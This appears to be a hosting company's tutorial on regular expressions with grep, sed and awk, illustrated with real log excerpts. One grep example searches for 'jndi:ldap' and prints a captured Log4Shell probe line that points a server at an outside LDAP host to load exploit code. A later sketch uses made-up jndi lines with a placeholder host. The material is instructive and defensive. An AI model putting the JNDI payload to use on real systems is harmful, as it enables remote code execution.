17 December 2021
A regular expression, or regex, is a sequence of characters that represents a pattern. Regular expressions are commonly used in code and text processing. For instance, you can use a regex to validate user input or to filter specific data from a log file.
Regular expressions should not be confused with globbing. A glob is also a sequence of characters that represents a pattern, but it is used only for file name expansion on the command line. As a simple example of globbing, you can list all PHP files in a directory with the command ls *.php. The glob in the command is the asterisk, which on its own matches zero or more characters. In a regex the asterisk is a quantifier: it matches zero or more instances of the preceding character. There are a few differences like this, and it is easy to get them muddled up.
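The difference is easiest to see side by side. The following is a minimal sketch, assuming a POSIX shell and a standard grep; the function names and sample strings are made up for illustration.

```shell
# Glob: the asterisk stands on its own and matches any run of characters.
glob_is_php() {
  case "$1" in
    *.php) return 0 ;;
    *)     return 1 ;;
  esac
}

# Regex: the asterisk repeats the item before it, so 'ab*c' means
# "a, then zero or more b, then c".
regex_ab_star_c() {
  printf '%s\n' "$1" | grep -q '^ab*c$'
}

if glob_is_php "index.php"; then echo "glob: index.php matches"; fi

for s in ac abc abbbc adc; do
  if regex_ab_star_c "$s"; then
    echo "regex: $s matches"
  else
    echo "regex: $s does not match"
  fi
done
```

Only "adc" is rejected by the regex, because the "d" is neither a "b" nor the closing "c".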
Another thing to be aware of is that there are two types of regular expressions: basic (BRE) and extended (ERE). As the names suggest, extended regular expressions have a few extra options. Utilities such as grep and sed use basic regular expressions by default. However, with both you can use the -E option to enable extended regular expressions.
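To see what the -E option changes in practice, here is a small sketch using the pipe symbol, which is an ordinary character in a basic regular expression and an OR operator in an extended one. It assumes GNU grep (other implementations should behave the same for this case), and the sample lines are invented.

```shell
# Three made-up lines; the last one contains a literal pipe symbol.
sample() { printf '%s\n' 'cat' 'dog' 'cat|dog'; }

# BRE (default): the pipe is a literal character, so only the
# line containing "cat|dog" is returned.
sample | grep 'cat|dog'

# ERE (-E): the pipe means "cat OR dog", so all three lines are returned.
sample | grep -E 'cat|dog'
```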
The caret (^) and dollar sign ($) denote the start and end of a string. You can use the caret to get lines in a file that start with a certain string, such as a date or IP address:
# grep ^1.2.3.4 /var/log/httpd/example.log
1.2.3.4 - - [14/Dec/2021:04:55:27 +0000] "GET /wp-login.php HTTP/1.1" 403 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
Or, on a RHEL-based system you can count the number of AMD64 packages by looking at the end of the package names. Here, I list all packages on my system and then pipe the output to a grep command that counts the number of lines that end with the string “x86_64”:
# rpm -qa | grep -c x86_64$
541
And you can also use both anchors. For instance, this is a quick way to delete empty lines using sed. The command matches any lines in the file data that start and end with nothing (i.e. there is nothing between the caret and dollar sign):
$ sed '/^$/d' data
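If you want to try the anchors without touching a real file, you can feed a few lines to the commands with printf. This is only a sketch: the sample input is made up, and it assumes a POSIX shell with standard grep and sed.

```shell
# Made-up input containing two empty lines.
sample() { printf '%s\n' 'first' '' 'second' '' 'third'; }

# Caret: lines that start with "s".
sample | grep '^s'

# Dollar sign: count the lines that end with "d".
sample | grep -c 'd$'

# Both anchors: delete lines with nothing between start and end.
sample | sed '/^$/d'
```

Keep in mind that a line containing only spaces or tabs is not empty as far as this pattern is concerned, so sed would leave it in place.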
A dot matches any character. For instance, here I look for lines in a log file where the first field matches the pattern “^2021-12-1.$”:
# awk '$1 ~ /^2021-12-1.$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter [862]: INFO [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter [862]: INFO [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter [862]: INFO [sshd] Found 34.118.67.208 - 2021-12-15 16:23:10
If you are an eagle-eyed reader then you might have noticed that the regex is more or less redundant. For this log file the pattern “2021-12-1” would return the same set of results. The difference is that the pattern “^2021-12-1.$” makes sure that you only match lines where the first field is exactly “2021-12-1” plus a single character. It would ignore any malformed date fields.
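Because a dot matches any character, it also matches more than you might expect in strings that contain literal dots, such as IP addresses. The sketch below uses two invented log lines to show the effect, and how a backslash makes the dot literal. It assumes a standard grep.

```shell
# Made-up log lines: only the first one comes from the address 1.2.3.4.
sample() {
  printf '%s\n' \
    '1.2.3.4 - - "GET /wp-login.php"' \
    '112.3.4.9 - - "GET /index.php"'
}

# Unescaped dots match any character, so both lines are counted.
sample | grep -c '^1.2.3.4'

# Escaped dots match literal dots only, and the trailing space
# marks the end of the address, so one line is counted.
sample | grep -c '^1\.2\.3\.4 '
```

The second line sneaks through the first pattern because “112.3.4” is a “1”, any character, a “2”, any character, and so on.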
The dot is often used in combination with the asterisk, which is a quantifier that matches the preceding character zero or more times. You can use this to grep multiple strings on a single line. For instance, here I look for lines containing the strings “14/Dec” and “jndi:ldap” (with anything in between the two patterns):
# grep "14/Dec.*jndi:ldap" /var/log/httpd/example.log
112.74.52.90 - - [14/Dec/2021:11:40:06 +0000] "GET / HTTP/1.1" 200 4917 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"
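One thing to remember is that the two strings have to appear in the order given in the pattern. Here is a minimal sketch with made-up log lines (the host example.invalid is a placeholder) that assumes a standard grep:

```shell
# Made-up log lines. Single quotes stop the shell from expanding ${...}.
sample() {
  printf '%s\n' \
    '[14/Dec/2021] "GET /" "${jndi:ldap://example.invalid/a}"' \
    '[15/Dec/2021] "GET /" "${jndi:ldap://example.invalid/b}"' \
    '[14/Dec/2021] "GET /about" "-"'
}

# Only the first line has both strings, in this order: prints 1.
sample | grep -c '14/Dec.*jndi:ldap'

# Reversing the order matches nothing: prints 0.
# grep exits with status 1 when nothing matches, hence the "|| true".
sample | grep -c 'jndi:ldap.*14/Dec' || true
```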
A minute ago I argued that the pattern “^2021-12-1.$” is slightly better than “2021-12-1”. As things stand, though, the pattern would match a string like “2021-12-1x”. That is a problem, as our aim is to match (valid) dates.
We can further improve the pattern by making sure that the last character is a digit. To do so, you can use a range:
# awk '$1 ~ /^2021-12-1[0-9]$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter [862]: INFO [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter [862]: INFO [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter [862]: INFO [sshd] Found 34.118.67.208 - 2021-12-15 16:23:10
A range is defined in square brackets. In the above example I used “[0-9]”, which matches any single digit from 0 to 9. You can do the same with letters. For instance, “[a-z]” matches any lower-case letter of the alphabet. It is worth pointing out that the latter pattern is case-sensitive. To match any letter of the alphabet in either lower or upper case you can use “[a-zA-Z]”. And to match any alphanumeric character you can use “[a-zA-Z0-9]”.
You can also list specific characters rather than a range. For instance, if you have a script that needs to check if a user answered “y” or “Y” to a question then you can use “[yY]”.
You can also do the reverse. If you want to match any character that is not a digit then you can put a caret at the start of the range. So, “[^0-9]” matches any single character except a digit. Notice that the meaning of the caret symbol is now wildly different from its earlier meaning. Outside ranges the caret denotes the start of a string.
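The negated range is easy to misread: “[^0-9]” succeeds as soon as a string contains one non-digit, which is not the same as checking that a string contains no digits. The sketch below shows the difference. The function names are my own, and it assumes a standard grep.

```shell
# Succeeds if the answer is a single "y" or "Y".
is_y() { printf '%s\n' "$1" | grep -q '^[yY]$'; }

# Succeeds if the string contains at least one character that is not a digit.
has_non_digit() { printf '%s\n' "$1" | grep -q '[^0-9]'; }

# Succeeds if the string consists of digits only (and is not empty).
is_all_digits() { printf '%s\n' "$1" | grep -q '^[0-9][0-9]*$'; }

for s in 1234 12a4; do
  if has_non_digit "$s"; then echo "$s: contains a non-digit"; fi
  if is_all_digits "$s"; then echo "$s: digits only"; fi
done
```

Anchoring the range with a caret and dollar sign, as in is_all_digits, is usually what you want when validating input.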
There are a few special character classes you can use instead of ranges such as “[a-z]”. These classes use a pair of double square brackets, and the type of class is defined inside a pair of colons.
Class | Matches | Equivalent |
---|---|---|
[[:alpha:]] | Alphabetical characters | [a-zA-Z] |
[[:alnum:]] | Alphabetical characters and digits | [a-zA-Z0-9] |
[[:blank:]] | Space or tab characters | [ \t] |
[[:digit:]] | Digits | [0-9] |
[[:lower:]] | Lower case alphabetical characters | [a-z] |
[[:upper:]] | Upper case alphabetical characters | [A-Z] |
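As a quick illustration of the classes in the table, here is a sketch with two small helper functions. The function names are invented, and I set LC_ALL=C for the letter classes so that they behave like the plain ASCII equivalents in the table.

```shell
# Succeeds if the word is one upper-case letter followed by
# zero or more lower-case letters.
is_capitalised() {
  printf '%s\n' "$1" | LC_ALL=C grep -q '^[[:upper:]][[:lower:]]*$'
}

# Succeeds if the line holds only spaces and tabs (or nothing at all).
is_blank_line() {
  printf '%s\n' "$1" | grep -q '^[[:blank:]]*$'
}

for w in London london LONDON; do
  if is_capitalised "$w"; then
    echo "$w: capitalised"
  else
    echo "$w: not capitalised"
  fi
done
```

The is_blank_line helper is a handy companion to the “^$” pattern, as it also catches lines that look empty but contain whitespace.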
Extended regular expressions bring a few more meta characters to the party. As mentioned, you need to use the -E option if you want to use ERE in grep and sed.
Like the asterisk, the question mark is a quantifier. But, whereas the asterisk matches the preceding character zero or more times, the question mark matches the preceding character zero or one time. To illustrate, if you want to check if a user entered “y”, “Y”, “yes” or “YES” then you can use the pattern “^[yY][eE]?[sS]?$”. Note that the pattern is a little more permissive than that list: it also accepts mixed case such as “Yes” and partial answers such as “ye” or “ys”:
$ echo 'y' | grep -E "^[yY][eE]?[sS]?$"
y
$ echo 'YES' | grep -E "^[yY][eE]?[sS]?$"
YES
$ echo 'YES!' | grep -E "^[yY][eE]?[sS]?$"
Notice that the string “YES!” does not match. The reason is that I used the dollar sign to mark where the string ends.
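Since each question mark makes its own character optional, it is worth checking exactly which answers the pattern lets through. A simple way to do that is to loop over a list of candidates. This is just a sketch, and the function name is made up:

```shell
# The pattern from the example above.
accepts() { printf '%s\n' "$1" | grep -Eq '^[yY][eE]?[sS]?$'; }

for answer in y Y yes YES Yes ye ys 'YES!' no; do
  if accepts "$answer"; then
    echo "accepted: $answer"
  else
    echo "rejected: $answer"
  fi
done
```

Everything up to and including “ys” is accepted; only “YES!” and “no” are rejected.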
Curly braces ({ and }) let you specify how many times the preceding element can appear. For instance, let’s say you want to check if a string uses the format YYYY-MM-DD. You can do that with the following pattern:
$ echo '2021-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15
$ echo '21-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
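The second test failed because the string “21-12-15” doesn’t start with four digits. If you want to allow a year of two to four digits then you can use this pattern instead. Be aware that “{2,4}” means “at least two and at most four”, so a three-digit year would match as well: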
$ echo '2021-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15
$ echo '21-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15
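To get a feel for what the “{2,4}” interval accepts, you can run the pattern against a few year lengths. The following is a small sketch with an invented function name; it checks the format only, not whether the date is a real calendar date.

```shell
# Succeeds if the string looks like a date with a 2 to 4 digit year.
date_loose() {
  printf '%s\n' "$1" |
    grep -Eq '^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$'
}

for d in 21-12-15 021-12-15 2021-12-15 12021-12-15; do
  if date_loose "$d"; then
    echo "$d: match"
  else
    echo "$d: no match"
  fi
done
```

The three-digit year “021” matches, while the five-digit year is rejected because the caret anchors the pattern to the start of the string.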
An alternative way to validate the strings “2021-12-15” and “21-12-15” is to use grouping expressions. You can group a pattern using parentheses, and you can then apply a quantifier to the whole group. So, you can use “(20)?” if the string may or may not start with “20”:
$ echo '2021-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15
$ echo '21-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15
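Grouping is also a way to tighten the earlier yes/no check. By making “es” optional as a unit, rather than making the “e” and the “s” optional separately, partial answers such as “ye” and “ys” no longer match. This is a sketch of one possible approach, with a made-up function name:

```shell
# Succeeds for "y" or "yes" in any mix of upper and lower case.
is_yes() { printf '%s\n' "$1" | grep -Eq '^[yY]([eE][sS])?$'; }

for answer in y Y yes YES Yes ye ys; do
  if is_yes "$answer"; then
    echo "accepted: $answer"
  else
    echo "rejected: $answer"
  fi
done
```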
The pipe symbol (|) functions as an OR operator. In other words, it lets you match one of multiple patterns. This can be handy to grep lines that contain one of multiple strings.
For instance, if you want to check if a website redirects correctly you can use a simple cURL command. That works, but the output contains lots of other information:
$ curl -IL catalyst2.com
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
date: Tue, 14 Dec 2021 15:04:41 GMT
location: https://catalyst2.com/
x-frame-options: SAMEORIGIN
HTTP/2 301
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
expires: Mon, 13 Dec 2021 14:11:46 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://www.catalyst2.com/
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
HTTP/2 200
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
link: <https://www.catalyst2.com/wp-json/>; rel="https://api.w.org/"
link: <https://www.catalyst2.com/wp-json/wp/v2/pages/5>; rel="alternate"; type="application/json"
link: <https://www.catalyst2.com/>; rel=shortlink
etag: "24284-1639400931;;;"
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
To get just the information you are interested in you can grep lines that start with either “HTTP” or “Location”. The parentheses matter here: without them the caret would apply only to “http”, and “location” would match anywhere on a line:
$ curl --silent -IL catalyst2.com | grep -Ei '^(http|location)'
HTTP/1.1 301 Moved Permanently
location: https://catalyst2.com/
HTTP/2 301
location: https://www.catalyst2.com/
HTTP/2 200
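The OR operator has the lowest precedence in a regex, so an anchor written in front of the first alternative belongs to that alternative only. The sketch below shows the difference between an ungrouped and a grouped alternation. The headers are made up, and “x-original-location” in particular is a hypothetical header that I added to trigger the difference.

```shell
# Made-up response headers; "x-original-location" is hypothetical.
sample() {
  printf '%s\n' \
    'HTTP/1.1 301 Moved Permanently' \
    'location: https://example.com/' \
    'x-original-location: http://example.com/' \
    'content-type: text/html'
}

# Ungrouped: lines that start with "http", OR contain "location"
# anywhere. Counts 3 lines.
sample | grep -Eic '^http|location'

# Grouped: lines that start with "http" or start with "location".
# Counts 2 lines.
sample | grep -Eic '^(http|location)'
```

With real cURL output the two patterns will often return the same lines, but the grouped version is the one that does what the description says.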